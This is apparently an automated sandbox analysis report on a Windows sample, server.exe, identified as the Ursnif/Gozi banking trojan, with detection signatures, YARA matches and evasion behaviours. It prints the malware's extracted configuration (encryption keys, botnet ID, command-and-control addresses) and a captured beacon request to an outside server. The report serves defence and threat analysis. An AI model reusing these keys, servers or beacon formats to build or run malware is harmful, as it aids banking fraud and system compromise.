Windows Analysis Report
server.exe

Overview

General Information

Sample Name: server.exe
Analysis ID: 826138
MD5: 43cfce2e126b1bf5230e51edd205f6bd
SHA1: 9ca60bfc3cb13b40f02810869ce9531cb0ab76d4
SHA256: 47d288233a39a68396567e35a77a500e296218df3a4bc9daca797e75b4b03d4b
Tags: agenziaentrateexegoziisfbITAmefmiseursnif
Infos:

Detection

Ursnif, CryptOne
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected CryptOne packer
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection

barindex
Source: server.exe ReversingLabs: Detection: 12%
Source: 0.2.server.exe.2190174.1.unpack Avira: Label: TR/Kazy.4159236
Source: 0.2.server.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_02BD1508

Compliance

barindex
Source: C:\Users\user\Desktop\server.exe Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: server.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Networking

barindex
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49685 -> 62.173.142.51:80
Source: global traffic HTTP traffic detected: GET /drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View ASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
Source: unknown DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown TCP traffic detected without corresponding DNS query: 62.173.142.51
Source: unknown TCP traffic detected without corresponding DNS query: 94.103.183.153
Source: unknown TCP traffic detected without corresponding DNS query: 94.103.183.153
Source: unknown TCP traffic detected without corresponding DNS query: 94.103.183.153
Source: server.exe, 00000000.00000002.569377745.00000000027FC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://94.103
Source: unknown DNS traffic detected: queries for: checklist.skype.com
Source: global traffic HTTP traffic detected: GET /drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR

E-Banking Fraud

barindex
Source: Yara match File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_02BD1508

System Summary

barindex
Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\Desktop\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: server.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD16DF 0_2_02BD16DF
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD1D8A 0_2_02BD1D8A
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD832C 0_2_02BD832C
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset, 0_2_0040110B
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_00401459 NtMapViewOfSection, 0_2_00401459
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_004019F1
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_02BD421F
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD8551 NtQueryVirtualMemory, 0_2_02BD8551
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02190F65 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError, 0_2_02190F65
Source: server.exe ReversingLabs: Detection: 12%
Source: C:\Users\user\Desktop\server.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\server.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_02BD30D5
Source: C:\Users\user\Desktop\server.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@1/2
Source: C:\Users\user\Desktop\server.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\server.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\server.exe Unpacked PE file: 0.2.server.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\server.exe Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD7F30 push ecx; ret 0_2_02BD7F39
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD831B push ecx; ret 0_2_02BD832B
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_0219A3E0 push edx; ret 0_2_0219A558
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_0219A290 push edx; ret 0_2_0219A29B
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_00401000 LoadLibraryA,GetProcAddress, 0_2_00401000

Hooking and other Techniques for Hiding and Protection

barindex
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon.png
Source: Yara match File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR
Source: C:\Users\user\Desktop\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\server.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\server.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\server.exe API call chain: ExitProcess graph end node

Anti Debugging

barindex
Source: C:\Users\user\Desktop\server.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_00401000 LoadLibraryA,GetProcAddress, 0_2_00401000
Source: C:\Users\user\Desktop\server.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\server.exe Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_004019F1
Source: C:\Users\user\Desktop\server.exe Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError, 0_2_02190F65
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD3BD3 cpuid 0_2_02BD3BD3
Source: C:\Users\user\Desktop\server.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_00401D68
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_004015B0
Source: C:\Users\user\Desktop\server.exe Code function: 0_2_02BD3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_02BD3BD3

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR